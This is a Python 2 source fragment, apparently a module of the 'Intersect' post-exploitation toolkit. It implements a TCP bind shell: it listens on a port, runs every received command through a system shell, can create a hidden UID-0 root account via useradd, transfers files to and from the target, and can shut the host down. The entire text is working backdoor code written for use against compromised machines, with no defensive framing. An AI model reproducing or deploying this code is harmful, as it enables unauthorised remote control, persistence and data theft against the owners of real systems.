
def bshell():
    '''
    @description: Starts a TCP bind shell on the target system. Interactive shell with download/upload, cd and ability to execute other modules remotely."
    @author: ohdae [bindshell@live.com]
    @short: TCP bindshell
    '''
    HOST = ''
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
    try:
        log_msg("[ Bindshell module executed ]")
        server.bind((HOST, PORT))
        server.listen(5)
    except:
        print "[!] Connection closed."
        sys.exit(2)
                                
    while 1:                                     
        conn, addr = server.accept()
        log_msg("New shell connection")
        conn.send("\nIntersect "+str(os.getcwd())+" => ")
        reaper()
        childPid = os.fork()
        if childPid == 0:
            tcphandle(conn)
        else:
            shellPID.append(childPid)


def tcphandle(conn):
    time.sleep(3)
    
    while True:
        cmd = conn.recv(socksize)
        proc = Popen(cmd,
             shell=True,
             stdout=PIPE,
             stderr=PIPE,
             stdin=PIPE,
             )
        stdout, stderr = proc.communicate()

        if cmd.startswith('cd'):
            destination = cmd[3:].replace('\n','')
            if os.path.isdir(destination):
                os.chdir(destination)
                conn.send("\nIntersect "+str(os.getcwd())+" => ")
            else:
                conn.send("[!] Directory does not exist") 
                conn.send("\nIntersect "+str(os.getcwd())+" => ")

        elif cmd.startswith(':addroot'):
            strip = cmd.split(" ")
            acct = strip[1]
            os.system("/usr/sbin/useradd -M -o -s /bin/bash -u 0 -l " + acct)
            conn.send("[+] Root account " + acct + " has been created.") 

        elif cmd.startswith(':upload'):
            getname = cmd.split(" ")
            rem_file = getname[1]
            filename = rem_file.replace("/","_")
            filedata = conn.recv(socksize)
            newfile = file(filename, "wb")
            newfile.write(filedata)
            newfile.close()
            if os.path.isfile(filename):
                conn.send("[+] File upload complete!")
            if not os.path.isfile(filename):
                conn.send("[!] File upload failed! Please try again")

        elif cmd.startswith(':download'):
            getname = cmd.split(" ")
            loc_file = getname[1]
            if os.path.exists(loc_file) is True:
                sendfile = open(loc_file, "r")
                filedata = sendfile.read()
                sendfile.close()
                conn.sendall(filedata)
            else:
                conn.send("[+] File not found!")

        elif cmd.startswith(":reboot"):
            conn.send("[!] Server system is going down for a reboot!")
            os.system("shutdown -h now")

        elif cmd == (":mods"):
            conn.send(str(modList))
            conn.send("\nIntersect "+str(os.getcwd())+" => ")

        elif cmd.startswith(":exec"):
            pass
            #getname = cmd.split(" ")
            #mod = getname[1]
            #if mod in modList:
            #    mod = mod+"()"
            #        exec mod
            #else:
            #    conn.send("Module not loaded!")

        elif cmd == (':killme'):
            sys.exit(0)

        elif cmd == (':quit'):
            conn.send("[!] Closing shell connection!\n")
            conn.close()
            os._exit(0)

        elif proc:
            conn.sendall( stdout )
            conn.send("\nIntersect "+str(os.getcwd())+" => ")



